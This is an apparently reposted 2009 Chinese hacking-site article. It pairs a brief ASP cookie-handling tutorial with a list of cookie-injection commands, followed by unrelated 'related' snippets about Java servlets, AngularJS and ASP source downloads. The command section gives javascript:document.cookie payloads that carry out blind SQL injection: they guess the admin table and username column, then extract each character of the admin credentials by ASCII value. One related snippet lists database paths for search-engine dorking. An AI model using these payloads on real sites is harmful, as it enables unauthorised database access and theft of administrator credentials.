Cookies注入详解与指令 2009-10-29 10:19:54 www.hackbase.com 来源:互联网
1.如何写入Cookies? Response.Cookies("字段名")=变量或字符串,例如: Response.Cookies("name2")="Dingdang" 2.如何设置Cookies时间? Response.Cookies("字段名").expires=时间 ...
1.如何写入Cookies?
Response.Cookies("字段名")=变量或字符串,例如:
Response.Cookies("name2")="Dingdang"
2.如何设置Cookies时间?
Response.Cookies("字段名").expires=时间函数+N,例如:
Response.Cookies("name2").expires=date+1,表示Cookies保存1天,再比如:
Response.Cookies("name2").expires=Hour+8,表示Cookies保存8小时。
3.在以往的ASP教程中,很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写:
Response.Cookies("字段名")=""
之后,在客户端的浏览器就清除了Cookies,并且Cookies文件会消失。注意有多少个字段,就要写多少句来清除。
4.如何读取Cookies?
变量名=Request.Cookies("字段名"),例如:
name2=Request.Cookies("name2")
如果网页中写入<%=name2%>这句,则会显示“Dingdang”。
也可以这样直接读取Cookies,<%=Request.Cookies("name2")%>
Cookies是属于Session对象的一种。但有不同,Cookies不会占服务器资源;而“Session”则会占用服务器资源。所以,尽量不要使用Session,而使用Cookies。
指令:
javascript:alert(document.cookie="id="+escape("156 and 1=1"));
javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
//猜是否有admin表
javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
//猜是否有username表
javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
//看管理员密码是否是5位
javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
//第一位是否是ASC码97,相当于a
javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
//第二位
javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
//看系统表
分享到:
相关推荐
9.1.2 cookies 304 9.1.3 url重写 305 9.2 java servlet api的会话跟踪 306 9.2.1 httpsession接口 306 9.2.2 session的生命周期 307 9.2.3 cookie的应用 319 9.2.4 httpsessionbindinglistener接口 328 ...
本文将详解AngularJS中的popup-table指令,该指令用于在网页中创建弹出框样式的表格组件。 在深入理解popup-table指令之前,先了解几个关键点是非常必要的。首先,AngularJS中的指令是通过定义一个新元素或者属性来...
9.1.2 cookies 304 9.1.3 url重写 305 9.2 java servlet api的会话跟踪 306 9.2.1 httpsession接口 306 9.2.2 session的生命周期 307 9.2.3 cookie的应用 319 9.2.4 httpsessionbindinglistener接口 328 ...
9.1.2 cookies 304 9.1.3 url重写 305 9.2 java servlet api的会话跟踪 306 9.2.1 httpsession接口 306 9.2.2 session的生命周期 307 9.2.3 cookie的应用 319 9.2.4 httpsessionbindinglistener接口 328 ...
9.1.2 cookies 304 9.1.3 url重写 305 9.2 java servlet api的会话跟踪 306 9.2.1 httpsession接口 306 9.2.2 session的生命周期 307 9.2.3 cookie的应用 319 9.2.4 httpsessionbindinglistener接口 328 ...
AngularJS是一款来自Google的前端JS框架,它的核心特性有:MVC、双向数据绑定、指令和语义化标签、模块化工具、依赖注入、HTML模板,以及对常用工具的封装,例如$http、$cookies、$location等。 关于AngularJS中...
**AngularJS 1.x 知识点详解** AngularJS,作为一个强大的前端JavaScript框架,由Google维护,主要用于构建单页面应用程序(SPA)。它通过双向数据绑定、依赖注入、指令系统等特性,极大地简化了Web开发流程。下面...
**AngularJS 源代码详解** AngularJS,作为Google推出的一款强大的JavaScript框架,自发布以来就备受开发者青睐。它主要用于构建动态Web应用,通过MVC(Model-View-Controller)架构模式,使得前端开发变得更加简洁...
Servlet通过HttpServlet类处理HTTP请求,实现了与客户端的交互,并且可以通过会话跟踪、cookies等技术保持用户状态。 Struts是一个开源的MVC(Model-View-Controller)框架,它简化了基于Java的Web应用开发。Struts...
magic_quotes_gpc是一个PHP配置指令,它影响通过GET、POST、Cookies接收到的数据。当magic_quotes_gpc开启时(即值为1),接收到的数据中的单引号(')、双引号(")和反斜杠(\)会被自动转义(即在这些特殊字符前加上反...
【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在“基于ASP的窝窝网聚音乐分享程序 v3.0.zip”这个压缩包中,我们可以推测它包含了一个利用ASP技术...
【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在“基于ASP的大型婚纱摄影网 v1.0.zip”这个项目中,我们可以深入探讨ASP在构建大型网站时的应用及其...
【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在1996年,ASP首次亮相,为Web开发者提供了一个简单而强大的工具来构建动态网站。它允许开发人员将...
【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在1996年,ASP首次亮相,为Web开发者提供了一个强大的工具,允许他们将HTML、脚本语言和服务器组件...
【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在“基于ASP的无酒电影网站源码 v1.0.zip”这个项目中,我们可以深入理解ASP的核心概念和应用。 1. ...
#### 五、JSP页面指令与内置对象 - **Page指令**:`<%@ page %>`标签用于设置JSP页面的各种属性,如编码方式、错误处理等。 - **内置对象**:JSP提供了多个内置对象简化页面处理,如`out`用于输出数据、`request`...
**JSP相册管理系统详解** JSP(JavaServer Pages)是一种动态网页技术,它允许开发者在HTML或XML文档中嵌入Java代码,从而实现服务器端的动态内容生成。本项目"JSP-photo.rar_jsp相册"是一个针对初学者设计的简单...
**ASP网络程序设计题解详解** ASP(Active Server Pages)是一种经典的服务器端脚本语言,由微软公司开发,用于创建动态、交互式的Web应用程序。它允许开发者在HTML代码中嵌入脚本语言,如VBScript或JScript,使得...
【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在1996年,ASP首次亮相,为Web开发者提供了一个强大的工具,允许他们将HTML、脚本语言和服务器组件...
29. **רCookies**: 用于搜索与Cookie相关的页面,可能存在会话劫持的风险。 30. **data/team.mdb**: 用于搜索包含团队信息的数据库文件,可能存在未加密的数据。 31. **/database/mysz**: 用于搜索特定的数据库...